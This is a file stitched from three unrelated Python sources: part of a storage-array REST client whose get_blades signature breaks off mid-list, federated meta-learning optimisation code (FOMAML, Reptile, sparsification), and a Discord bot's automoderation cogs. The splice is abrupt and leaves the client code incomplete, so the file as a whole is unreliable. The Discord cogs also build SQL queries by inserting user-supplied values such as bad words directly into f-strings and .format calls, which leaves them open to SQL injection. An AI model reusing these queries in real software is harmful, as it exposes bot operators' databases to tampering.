async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArraySpaceGetResponse
"""
List available and used storage space on the array.
Args:
end_time (int, optional):
When the time window ends (in milliseconds since epoch).
resolution (int, optional):
The desired ms between samples. Available resolutions may depend on data type,
`start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`,
`7200000`, and `86400000` are possible values.
start_time (int, optional):
When the time window starts (in milliseconds since epoch).
type (str, optional):
                Display the metric of a specified object type. Valid values are `array`,
                `file-system`, and `object-store`. If not specified, defaults to `array`.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
end_time=end_time,
resolution=resolution,
start_time=start_time,
type=type,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._arrays_api.api20_arrays_space_get_with_http_info
return self._call_api(endpoint, kwargs)
def get_arrays_supported_time_zones(
self,
references=None, # type: List[models.ReferenceType]
continuation_token=None, # type: str
filter=None, # type: str
limit=None, # type: int
names=None, # type: List[str]
offset=None, # type: int
sort=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArraysSupportedTimeZonesGetResponse
"""
List supported time zones for the array.
Args:
references (list[FixedReference], optional):
A list of references to query for. Overrides names keyword arguments.
continuation_token (str, optional):
An opaque token to iterate over a collection of resources.
filter (Filter, optional):
A filter to include only resources that match the specified criteria.
limit (int, optional):
Limit the number of resources in the response. If not specified, defaults to
1000.
names (list[str], optional):
A list of resource names. If there is not at least one resource that matches
each of the elements of `names`, then an error is returned.
offset (int, optional):
The offset of the first resource to return from a collection.
sort (list[Property], optional):
Sort the response by the specified Properties. Can also be a single element.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
continuation_token=continuation_token,
filter=filter,
limit=limit,
names=names,
offset=offset,
sort=sort,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._arrays_api.api20_arrays_supported_time_zones_get_with_http_info
_process_references(references, ['names'], kwargs)
return self._call_api(endpoint, kwargs)
def get_audits(
self,
references=None, # type: List[models.ReferenceType]
continuation_token=None, # type: str
filter=None, # type: str
ids=None, # type: List[str]
limit=None, # type: int
names=None, # type: List[str]
offset=None, # type: int
sort=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.AuditGetResponse
"""
List the array audit trail to view activities that were performed on the array.
Args:
references (list[FixedReference], optional):
A list of references to query for. Overrides ids and names keyword arguments.
continuation_token (str, optional):
An opaque token to iterate over a collection of resources.
filter (Filter, optional):
A filter to include only resources that match the specified criteria.
ids (list[str], optional):
A list of resource IDs. If after filtering, there is not at least one resource
that matches each of the elements of `ids`, then an error is returned. This
cannot be provided together with the `name` or `names` query parameters.
limit (int, optional):
Limit the number of resources in the response. If not specified, defaults to
1000.
names (list[str], optional):
A list of resource names. If there is not at least one resource that matches
each of the elements of `names`, then an error is returned.
offset (int, optional):
The offset of the first resource to return from a collection.
sort (list[Property], optional):
Sort the response by the specified Properties. Can also be a single element.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
continuation_token=continuation_token,
filter=filter,
ids=ids,
limit=limit,
names=names,
offset=offset,
sort=sort,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._audits_api.api20_audits_get_with_http_info
_process_references(references, ['ids', 'names'], kwargs)
return self._call_api(endpoint, kwargs)
def get_blades(
self,
references=None, # type: List[models.ReferenceType]
continuation_token=None, # type: str
filter=None, # type: str
ids=None, # type: List[str]
limit=None, # type: int
names=None, # type: List[str]
offset=None, # type: int
sort=None, # type: List[str]
        total_only=None, # type: bool
arguments:
stepsize -- stepsize of local model
k -- number of inner steps of local model
"""
if not (model == 'expmix' or model == 'local'):
raise NameError('Unknown model {}. Available models are \'expmix\' and \'local\'.'.format(model))
loss_array = []
loss_weights = []
for worker_counter, worker in self.workers.items():
client_id = counter_to_id[worker_counter]
start_time = time.time()
x, y = load_data_npy(prefix=prefix, node_id=client_id, postfix_X=postfix_X, postfix_y=postfix_y)
assert y.shape[1] == self.d_y
assert x.shape[0] == y.shape[0]
start_time = time.time()
n, _ = x.shape
if model == 'expmix':
w_local = worker.compute_local(w)
else:
w_local = worker.local_steps(w, **kwargs)
loss_array.append(worker.fun_value_general(x, y, w_local))
loss_weights.append(n)
return np.average(a=loss_array, weights=loss_weights)
def compute_loss_on_external_dataset_mixture(self, w: np.ndarray, counter_to_id: list, prefix: str, postfix_X: str='_X', postfix_y: str='_y') -> np.float32:
return self.compute_loss_on_external_dataset(model='expmix', w=w, counter_to_id=counter_to_id, prefix=prefix, postfix_X=postfix_X, postfix_y=postfix_y)
def compute_loss_on_external_dataset_local(self, w: np.ndarray, counter_to_id: list, stepsize: float, k: int, prefix: str, postfix_X: str='_X', postfix_y: str='_y') -> np.float32:
return self.compute_loss_on_external_dataset(model='local', w=w, counter_to_id=counter_to_id, prefix=prefix, postfix_X=postfix_X, postfix_y=postfix_y, stepsize=stepsize, k=k)
@deprecated
def stochastic_grad(self, w: np.ndarray, task_batch='full', data_batch='full', chosen_workers=None):
"""Compute stochastic gradient for Explicit Mixture Algorithm."""
if chosen_workers is None:
if task_batch == 'full':
task_batch = len(self.workers)
generator = default_rng()
chosen_workers = generator.choice(len(self.workers), size=task_batch, replace=False)
stoch_grad_vec = np.array([self.workers[i].explicit_mixture_stochastic_grad(w, batch=data_batch)
for i in chosen_workers])
stoch_grad = np.mean(stoch_grad_vec, axis=0)
return stoch_grad
@deprecated
def modified_stochastic_grad(self, w: np.ndarray, task_batch='full', data_batch='full', chosen_workers=None):
"""Compute stochastic gradient for Modified Explicit Mixture Algorithm."""
if chosen_workers is None:
if task_batch == 'full':
task_batch = len(self.workers)
generator = default_rng()
chosen_workers = generator.choice(len(self.workers), size=task_batch, replace=False)
grad_vec = np.array([
self.workers[i].modified_explicit_mixture_stochastic_gradient(w, self.modexpmix_number_of_inner_steps, self.modexpmix_inner_loop_lr, data_batch)
for i in chosen_workers
])
grad = np.mean(grad_vec, axis=0)
return grad
@deprecated
def fomaml_grad(self, w: np.ndarray, task_batch='full', data_batch='full', chosen_workers=None):
"""Compute FOMAML gradient.
Arguments:
w -- point to compute the gradient at
batch -- number of data points used for estimating the gradient at each machine (default 'full')
"""
if chosen_workers is None:
if task_batch == 'full':
task_batch = len(self.workers)
generator = default_rng()
chosen_workers = generator.choice(len(self.workers), size=task_batch, replace=False)
grad_vec = np.array([
self.workers[i].fomaml_stochastic_grad(w, self.fomaml_number_of_inner_steps, self.fomaml_inner_loop_lr, data_batch)
for i in chosen_workers
])
# print("FOMAML's table of gradients: {}".format(grad_vec))
grad = np.mean(grad_vec, axis=0)
return grad
@deprecated
def reptile_update(self, w: np.ndarray, task_batch: [int, 'full']='full', data_batch: [int, 'full']='full', chosen_workers: [list, np.ndarray]=None, joint_dataset: bool=True) -> np.ndarray:
"""Compute Reptile update.
Arguments:
w -- point to compute the gradient at
task_batch -- number of computing edges involved in gradient estimation (default 'full')
data_batch -- number of data points used for estimating the gradient at each machine (default 'full')
chosen_workers -- array of workers involved in computation; if given task_batch parameter is ignored
joint_dataset -- boolean representing whether to concatenate train and validation dataset at each machine or not
"""
if chosen_workers is None:
if task_batch == 'full':
task_batch = len(self.workers)
generator = default_rng()
chosen_workers = generator.choice(len(self.workers), size=task_batch, replace=False)
update_vec = np.array([self.workers[i].reptile_stochastic_update(w, self.reptile_number_of_inner_steps, self.reptile_inner_loop_lr, data_batch, joint_dataset=joint_dataset)
for i in chosen_workers])
update = np.mean(update_vec, axis=0)
return update
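    # Illustrative sketch of the outer step driven by the update above (values
    # assumed, and assuming reptile_stochastic_update returns the offset w_i - w
    # of each worker's local iterate): if two sampled workers return offsets
    # [0.2, -0.4] and [0.0, 0.2], the averaged update is [0.1, -0.1], and
    # reptile() then moves w by reptile_outer_loop_lr * [0.1, -0.1].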
@deprecated
def sgd_mixed(self, w: np.ndarray=None, epochs=None, task_batch=5, data_batch='full', n_iter=100, save_history=False):
print_every = 100
if w is None:
generator = default_rng()
w = generator.normal(size=self.d)
history = [w]
if epochs is None:
            raise NotImplementedError
else:
generator = default_rng()
epoch_size = int(self.n_workers / task_batch)
curr_it = None
for epoch in range(epochs):
print('Epoch # {}'.format(epoch))
seq = generator.choice(self.n_workers, self.n_workers)
for i in range(epoch_size):
print('{} / {} epoch progress'.format(i, epoch_size))
chosen_workers = seq[i * task_batch : (i + 1) * task_batch]
curr_grad = self.stochastic_grad(w, data_batch=data_batch, chosen_workers=chosen_workers)
if (curr_grad.shape != w.shape):
                        warnings.warn('Gradient {} and w {} shapes mismatch. Shapes will be made equal.'.format(curr_grad.shape, w.shape))
curr_grad = np.reshape(curr_grad, w.shape)
w -= self.sgd_mixed_outer_loop * curr_grad
if save_history:
history.append(w)
curr_it = epoch * epoch_size + i
# if curr_it % print_every == 0:
# print('Iteration {}'.format(curr_it))
if save_history:
return history
else:
return w
@deprecated
def sgd_mixed_modified(self, w: np.ndarray=None, epochs=None, task_batch=5, data_batch='full', n_iter=100):
print_every = 100
if w is None:
generator = default_rng()
w = generator.normal(size=self.d)
if epochs is None:
            raise NotImplementedError
else:
generator = default_rng()
for epoch in range(epochs):
seq = generator.choice(self.n_workers, self.n_workers)
epoch_size = int(self.n_workers / task_batch)
for i in range(epoch_size):
chosen_workers = seq[i * task_batch : (i + 1) * task_batch]
curr_grad = self.modified_stochastic_grad(w, data_batch=data_batch, chosen_workers=chosen_workers)
w -= self.modexpmix_outer_loop_lr * curr_grad
curr_it = epoch * epoch_size + i
# if curr_it % print_every == 0:
# print('Iteration {}'.format(curr_it))
return w
@deprecated
def fomaml(self, w: np.ndarray = None, epochs=None, task_batch=5, data_batch='full', n_iter=100, save_history=False):
"""Run FOMAML. See https://arxiv.org/pdf/1803.02999.pdf
Arguments:
w -- initial guess (default None)
task_batch -- number of tasks sampled per outer-loop step (default 5)
data_batch -- number of data points used for estimating the gradient at each machine (default 'full')
n_iter -- number of iterations taken for FOMAML to run when epochs is None (default 100)
"""
print_every = 100
if w is None:
generator = default_rng()
w = generator.normal(size=self.d)
history = [w]
print("Running FOMAML.")
if epochs is None:
for it in range(n_iter):
print('Iteration {}'.format(it))
curr_grad = self.fomaml_grad(w, task_batch, data_batch)
w -= self.fomaml_outer_loop_lr * curr_grad
if save_history:
history.append(w)
# if it % print_every == 0:
# print('Iteration {}'.format(it))
# if it % 10 == 0:
# print("Iteration {}: current gradient: {}".format(it, curr_grad))
# print("Iteration {}: value of <<w>> {}".format(it, w))
else:
epoch_size = int(self.n_workers / task_batch)
curr_it = None
for epoch in range(epochs):
print('Epoch #{}'.format(epoch))
print('Epoch size is {}'.format(epoch_size))
generator = default_rng()
seq = generator.choice(self.n_workers, self.n_workers, replace=False)  # shuffled worker order for this epoch
for i in range(epoch_size):
print('{} / {} epoch progress'.format(i, epoch_size))
chosen_workers = seq[i * task_batch : (i + 1) * task_batch]
curr_grad = self.fomaml_grad(w, data_batch=data_batch, chosen_workers=chosen_workers)
w -= self.fomaml_outer_loop_lr * curr_grad
if save_history:
history.append(w)
curr_it = epoch * epoch_size + i
# if curr_it % print_every == 0:
# print('Iteration {}'.format(curr_it))
if save_history:
return history
else:
return w
@deprecated
def reptile(self, w: np.ndarray = None, epochs=None, task_batch=5, data_batch='full', n_iter=100, joint_dataset=True, save_history=False):
"""Run Reptile."""
print_every = 100
if w is None:
generator = default_rng()
w = generator.normal(size=self.d)
print("Running Reptile.")
history = [w]
if epochs is None:
for it in range(n_iter):
curr_update = self.reptile_update(w, task_batch, data_batch)
w += self.reptile_outer_loop_lr * curr_update
if save_history:
history.append(w)
# if it % print_every == 0:
# print('Iteration {}, current_update = {}, current w = {}'.format(it, curr_update, w))
else:
for epoch in range(epochs):
generator = default_rng()
seq = generator.choice(self.n_workers, self.n_workers, replace=False)  # shuffled worker order for this epoch
epoch_size = int(self.n_workers / task_batch)
curr_it = None
for i in range(epoch_size):
chosen_workers = seq[i * task_batch : (i + 1) * task_batch]
curr_update = self.reptile_update(w, data_batch=data_batch, chosen_workers=chosen_workers, joint_dataset=joint_dataset)
w += self.reptile_outer_loop_lr * curr_update
if save_history:
history.append(w)
curr_it = epoch * epoch_size + i
# if curr_it % print_every == 0:
# print('Iteration {}, current_update = {}, current w = {}'.format(curr_it, curr_update, w))
if save_history:
return history
else:
return w
def run_gd(self, n_iter=100, save_memory=False, exp_name='gd'):
"""Run Gradient Descent.
Arguments:
n_iter -- number of gradient descent iterations (default 100)
save_memory -- if False, record function values, gradient norms and distances to the optimum at every iteration
"""
lr = 1/self.smoothness
w = np.ones_like(self.workers[0].w_opt)
f_values = []
grad_norms = []
l2_distances = []
exp_name = 'gd' + exp_name
for it in range(n_iter):
grad = self.grad(w)
fun_value = self.fun_value(w)
if not save_memory:
f_values.append(fun_value)
grad_norms.append(np.sum(grad**2))
l2_distances.append(np.sum((w - self.w_opt_global)**2))
w -= lr * grad
print('{:5d}/{:5d} Iterations: fun_value {:f}'
.format(it + 1, n_iter, fun_value), end='\r')
print('')
if not save_memory:
f_values = np.array(f_values)
f_values -= self.fun_value(self.w_opt_global)
grad_norms = np.array(grad_norms)
save_run(exp_name, self.alpha, grad_norms, f_values, l2_distances, self.dataset_name, self.logreg)
return w
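# --- Editor's note: lr = 1/self.smoothness above is the classical safe step
# size. For an L-smooth function, gradient descent with step 1/L decreases f
# at every iteration. A tiny self-contained check on f(w) = 0.5 * L * w**2
# (hypothetical values, not tied to any dataset used here):
#
#     L_const, w = 4.0, 10.0
#     f = lambda x: 0.5 * L_const * x ** 2
#     for _ in range(5):
#         w_next = w - (1.0 / L_const) * (L_const * w)   # gradient is L*w
#         assert f(w_next) <= f(w)
#         w = w_next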
def find_min(self):
"""Return the minimum of the explicit mixture."""
print("Finding minimum of the global function with Gradient Descent...")
return self.run_gd(max(2 * self.max_it, self.max_it + 100), True)
def recompute_global_min(self, max_it):
print("Recomputing the minimum of the global function with Gradient Descent...")
self.w_opt_global = self.run_gd(max_it, True)
return
def sparsification(self, vec, k):
"""Return a random sparsification for the given vector.
Arguments:
vec -- the vector to be sparsified
k -- 'k' in random-k compression operator, the cardinality of the set of indices returned
"""
generator = default_rng()
d = vec.size
inds = generator.choice(a=np.arange(d), size=k, replace=False)
positions = np.zeros(d)
positions[inds] = float(d) / k
# omega = d/k - 1
return positions * vec
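# --- Editor's note: the random-k operator above is an unbiased compressor,
# since each coordinate survives with probability k/d and is rescaled by d/k,
# giving E[C(vec)] = vec. A hedged empirical check (standalone sketch, not
# repo code):
#
#     import numpy as np
#     from numpy.random import default_rng
#
#     def rand_k(vec, k, rng):
#         d = vec.size
#         positions = np.zeros(d)
#         positions[rng.choice(d, size=k, replace=False)] = float(d) / k
#         return positions * vec
#
#     rng = default_rng(0)
#     v = np.arange(1.0, 6.0)
#     est = np.mean([rand_k(v, 2, rng) for _ in range(100000)], axis=0)
#     assert np.allclose(est, v, atol=0.1)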
<reponame>FabiChan99/Hikari-Discord-Bot
import datetime
import re

import discord
from discord.ext import commands
from Utils.data import *
stupidword = "https://cdn.discordapp.com/attachments/836905275252408341/838075043271016468/StupidWord.png"
DISCORD_INVITE = r'discord(?:app\.com|\.gg)[\/invite\/]?(?:(?!.*[Ii10OolL]).[a-zA-Z0-9]{5,7}|[a-zA-Z0-9\-]{2,32})'
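# Editor's note: a minimal sketch of how the DISCORD_INVITE pattern behaves on
# hypothetical inputs (not taken from the original repo):
#
#     import re
#     _rx = re.compile(DISCORD_INVITE)
#     assert _rx.findall("join discord.gg/AbCdEf now")   # invite-like link found
#     assert not _rx.findall("no invites here")          # plain text ignored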
class ImageOnlyAutomod(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
@commands.group(invoke_without_command=True)
async def imageonly(self, ctx):
embed = discord.Embed(
description=f'**AutoModeration Image-Only Channel**\n\n> `{prefix_data(ctx.guild.id)}imageonly add` Adds a new Channel\n> `{prefix_data(ctx.guild.id)}imageonly remove` Removes a Channel\n> `{prefix_data(ctx.guild.id)}imageonly list` List all Channels\n> `{prefix_data(ctx.guild.id)}imageonly clear` Clears all configured Channels!',
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Image-Only",
icon_url="https://cdn.discordapp.com/attachments/836905275252408341/837266055709589504/StupidImage2.png")
await ctx.message.reply(embed=embed, mention_author=False)
@imageonly.command(aliases=["set"])
@commands.has_permissions(administrator=True)
async def add(self, ctx, channelid: discord.TextChannel = None):
try:
channelid = channelid.id
except AttributeError:
pass
try:
if not channelid:
embed = discord.Embed(description="You need to mention the Channel or its ID",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="No Channel given", icon_url=cross_icon())
await ctx.send(embed=embed)
return
except AttributeError:
return
self.bot.cursor.execute(
f"SELECT channelid FROM imageonly WHERE guildid = '{ctx.guild.id}' and channelid = '{channelid}'")
result = self.bot.cursor.fetchone()
if result is None:
sql = ("INSERT INTO imageonly(guildid, channelid) VALUES(%s,%s)")
val = (str(ctx.guild.id), channelid)
self.bot.cursor.execute(sql, val)
self.bot.connection.commit()
embed = discord.Embed(description=f"Channel <#{channelid}> added to the Image-Only Automoderation")
embed.set_author(name="Automoderation | Image-Only", icon_url=chop_icon())
await ctx.message.reply(embed=embed, mention_author=False)
else:
embed = discord.Embed(description=f"Channel <#{channelid}> is already added!",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Image-Only", icon_url=cross_icon())
await ctx.message.reply(embed=embed, mention_author=False)
@imageonly.command(aliases=["unset"])
@commands.has_permissions(administrator=True)
async def remove(self, ctx, channelid: discord.TextChannel = None):
try:
channelid = channelid.id
except AttributeError:
pass
try:
if not channelid:
embed = discord.Embed(description="You need to mention the Channel or its ID",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="No Channel given", icon_url=cross_icon())
await ctx.send(embed=embed)
return
except AttributeError:
return
self.bot.cursor.execute(
f"SELECT channelid FROM imageonly WHERE guildid = '{ctx.guild.id}' and channelid = '{channelid}'")
result = self.bot.cursor.fetchone()
if result is not None:
self.bot.cursor.execute(
"DELETE FROM imageonly WHERE guildid = '{}' and channelid = '{}'".format(ctx.guild.id, channelid))
self.bot.connection.commit()
embed = discord.Embed(description=f"Channel <#{channelid}> removed", color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Image-Only", icon_url=chop_icon())
await ctx.message.reply(embed=embed, mention_author=False)
else:
embed = discord.Embed(description=f"Channel <#{channelid}> not set as Image-Only!",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Image-Only", icon_url=cross_icon())
await ctx.message.reply(embed=embed, mention_author=False)
@imageonly.command(name='list')
@commands.has_permissions(administrator=True)
async def _list(self, ctx):
self.bot.cursor.execute(f"SELECT channelid FROM imageonly WHERE guildid = '{ctx.guild.id}'")
result = self.bot.cursor.fetchall()
res = list()
for i in result:
res.append(str(i[0]))
if res == []:
embed = discord.Embed(description="No Entrys", color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Image-Only", icon_url=cross_icon())
await ctx.send(embed=embed)
else:
embed = discord.Embed(description=", ".join(res), color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Image-Only", icon_url=cross_icon())
await ctx.send(embed=embed)
@imageonly.command()
@commands.has_permissions(administrator=True)
async def clear(self, ctx):
self.bot.cursor.execute(f"DELETE FROM imageonly WHERE guildid = '{ctx.guild.id}'")
self.bot.connection.commit()
embed = discord.Embed(description=f"Removed all Channels from Database.", color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Image-Only", icon_url=chop_icon())
await ctx.message.reply(embed=embed, mention_author=False)
@commands.Cog.listener()
async def on_message(self, message):
try:
if message.guild:
self.bot.cursor.execute(
f"SELECT channelid FROM imageonly WHERE channelid = {message.channel.id} AND guildid = {message.guild.id}")
row = self.bot.cursor.fetchone()
# fetchone() returns None when this channel is not configured as image-only
if row is not None and int(row[0]) == message.channel.id:
if message.attachments == []:
await message.delete()
try:
embed = discord.Embed(
description=f"Hey, `{message.author.name}`, the `{message.channel.name}` channel on `{message.guild.name}` is only for images. Please avoid sending text messages and instead send images only.",
color=color_data())
embed.set_author(name=f"Image Only Channel!",
icon_url="https://cdn.discordapp.com/attachments/771085429381922856/835885280367476796/2915_denied.png")
await message.author.send(embed=embed)
except AttributeError:
pass
except discord.errors.NotFound:
pass
except TypeError:
pass
class BadWordAutomod(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
@commands.group(invoke_without_command=True)
async def badword(self, ctx):
embed = discord.Embed(
description=f'**AutoModeration Badword List**\n\n> `{prefix_data(ctx.guild.id)}badword add` Adds a new Word\n> `{prefix_data(ctx.guild.id)}badword remove` Removes a Word\n> `{prefix_data(ctx.guild.id)}badword list` List all Badwords\n> `{prefix_data(ctx.guild.id)}badword clear` Clears all configured Badwords!',
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword",
icon_url=stupidword)
embed.set_footer(
text="Administrators are immune upon deletion! Added badwords only work if set lowercase! Dont worry it will Moderated if not lowercase in chat!")
await ctx.message.reply(embed=embed, mention_author=False)
@badword.command()
@commands.has_permissions(administrator=True)
async def add(self, ctx, badword):
try:
if not badword:
embed = discord.Embed(description="You Need to say the badword that should be added in to the database",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="No Word given", icon_url=cross_icon())
await ctx.send(embed=embed)
return
except AttributeError:
return
self.bot.cursor.execute(
f"SELECT word FROM badword WHERE guildid = '{ctx.guild.id}' AND word = '{badword}'")
result = self.bot.cursor.fetchone()
if result is None:
sql = ("INSERT INTO badword(guildid, word) VALUES(%s,%s)")
val = (str(ctx.guild.id), badword)
self.bot.cursor.execute(sql, val)
self.bot.connection.commit()
embed = discord.Embed(description=f"Word: `{badword}` added to the Automoderation Database",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword", icon_url=chop_icon())
await ctx.message.reply(embed=embed, mention_author=False)
else:
embed = discord.Embed(description=f"Word: `{badword}` is already added!",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword", icon_url=cross_icon())
await ctx.message.reply(embed=embed, mention_author=False)
@badword.command()
@commands.has_permissions(administrator=True)
async def remove(self, ctx, badword):
try:
if not badword:
embed = discord.Embed(description="You Need to say the badword that should be added in to the database",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="No Word given", icon_url=cross_icon())
await ctx.send(embed=embed)
return
except AttributeError:
return
self.bot.cursor.execute(
f"SELECT word FROM badword WHERE guildid = '{ctx.guild.id}' AND word = '{badword}'")
result = self.bot.cursor.fetchone()
if result is not None:
self.bot.cursor.execute(
"DELETE FROM badword WHERE guildid = '{}' and word = '{}'".format(ctx.guild.id, badword))
self.bot.connection.commit()
embed = discord.Embed(description=f"Word: `{badword}` removed", color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword", icon_url=chop_icon())
await ctx.message.reply(embed=embed, mention_author=False)
else:
embed = discord.Embed(description="Word: `{}` not set as Badword!".format(badword),
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword", icon_url=cross_icon())
await ctx.message.reply(embed=embed, mention_author=False)
@badword.command(name='list')
@commands.has_permissions(administrator=True)
async def _list(self, ctx):
self.bot.cursor.execute(f"SELECT word FROM badword WHERE guildid = '{ctx.guild.id}'")
result = self.bot.cursor.fetchall()
res = list()
for i in result:
res.append(str(i[0]))
if res == []:
embed = discord.Embed(description="No Entrys", color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword", icon_url=cross_icon())
await ctx.send(embed=embed)
else:
embed = discord.Embed(description=", ".join(res), color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword", icon_url=cross_icon())
await ctx.send(embed=embed)
@badword.command()
@commands.has_permissions(administrator=True)
async def clear(self, ctx):
self.bot.cursor.execute(f"DELETE FROM badword WHERE guildid = '{ctx.guild.id}'")
self.bot.connection.commit()
embed = discord.Embed(description=f"Removed all Badwords from Database.", color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword", icon_url=chop_icon())
await ctx.message.reply(embed=embed, mention_author=False)
@commands.Cog.listener()
async def on_message(self, message):
try:
if message.guild:
self.bot.cursor.execute(
f"SELECT word FROM badword WHERE guildid = '{message.guild.id}'")
result = self.bot.cursor.fetchall()
result2 = [i[0] for i in result]
if any(word in message.content.lower() for word in result2):
if message.author.guild_permissions.administrator: return
if discord.utils.get(message.author.roles, id=771734897475059753) is None:
await message.delete()
try:
embed = discord.Embed(
description=f"Hey, `{message.author.name}`, please try to avoid sending blacklisted words on `{message.guild.name}`",
color=guild_embedcolor_message(self, message))
embed.set_author(name="Bad Word!", icon_url=stupidword)
await message.author.send(embed=embed)
except AttributeError:
pass
except TypeError:
pass
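# Editor's note: `word in message.content.lower()` above is plain substring
# matching, so a badword "cat" would also flag "concatenate". A hedged sketch
# of a stricter word-boundary variant one could swap in (hypothetical helper,
# relying on the `re` import at the top of this file):
#
#     def contains_badword(content, badwords):
#         lowered = content.lower()
#         return any(re.search(r"\b" + re.escape(w) + r"\b", lowered)
#                    for w in badwords)
#
#     assert contains_badword("what a CAT", ["cat"])
#     assert not contains_badword("concatenate", ["cat"])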
class GenAutomod(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
@commands.Cog.listener()
async def on_message(self, message):
try:
timestampinv = datetime.datetime.now().strftime("%d.%m.%Y %H:%M:%S")
try:
self.bot.cursor.execute(
f"SELECT gid FROM antiinvite WHERE gid = '{message.guild.id}'")
setting = self.bot.cursor.fetchone()
if setting is not None:
regex = re.compile(DISCORD_INVITE)
invites = regex.findall(message.content)
if invites:
if message.author.guild_permissions.administrator: return
if message.author.bot: return
invite = invites[0]
invitedb = invites[0]
invite = await self.bot.fetch_invite(invite)
if invite.guild.id == message.guild.id: return
try:
self.bot.cursor.execute(f"DELETE FROM invitedb WHERE guildid = '{message.guild.id}'")
self.bot.connection.commit()
except Exception:
pass
sql = ("INSERT INTO invitedb(guildid, inviteurl, invts, uname) VALUES(%s,%s,%s,%s)")
val = (str(message.guild.id), invitedb, timestampinv, str(message.author))
self.bot.cursor.execute(sql, val)
self.bot.connection.commit()
await message.delete()
embed = discord.Embed(
description="Hey {}, don't send invites! Server Invites are not allowed here!".format(
message.author.mention), color=guild_embedcolor_message(self, message))
embed.set_author(name=f"Auto-Mod | Anti-Invite | Invite Posted!",
icon_url="https://cdn.discordapp.com/attachments/836905275252408341/837285292377243679/Error-512.png")
await message.channel.send(embed=embed)
try:
embed = discord.Embed(
description=f"Hey, `{message.author.name}`, don't send invites on `{message.guild.name}`! Thats forbidden!",
color=color_data())
embed.set_author(name=f"Auto-Mod | Anti-Invite | Invite Posted!",
icon_url="https://cdn.discordapp.com/attachments/836905275252408341/837285292377243679/Error-512.png")
await message.author.send(embed=embed)
except AttributeError:
pass
except AttributeError:
pass
except Exception:
self.bot.connection.rollback()
@commands.has_permissions(administrator=True)
@commands.command()
async def lastinvite(self, ctx, gid: discord.Guild = None):
if not gid:
gid = ctx.guild
try:
g = self.bot.get_guild(gid.id)
self.bot.cursor.execute(f"SELECT inviteurl FROM invitedb WHERE guildid = '{gid.id}'")
result = self.bot.cursor.fetchone()[0]
self.bot.cursor.execute(f"SELECT invts FROM invitedb WHERE guildid = '{gid.id}'")
resultts = self.bot.cursor.fetchone()[0]
self.bot.cursor.execute(f"SELECT uname FROM invitedb WHERE guildid = '{gid.id}'")
rname = self.bot.cursor.fetchone()[0]
await ctx.send(result)
await ctx.send("Last Invite from {}, it was sent {}, the User was {}".format(g.name, resultts, rname))
except Exception:
g = self.bot.get_guild(gid.id)
embed = discord.Embed(description="No Invite was posted in {}!".format(g.name),
color=guild_embedcolor_ctx(self, ctx))
await ctx.message.reply(embed=embed, mention_author=False)
return
@commands.has_permissions(administrator=True)
@commands.command()
async def clearlastinvite(self, ctx):
try:
self.bot.cursor.execute(f"DELETE FROM invitedb WHERE guildid = '{ctx.guild.id}'")
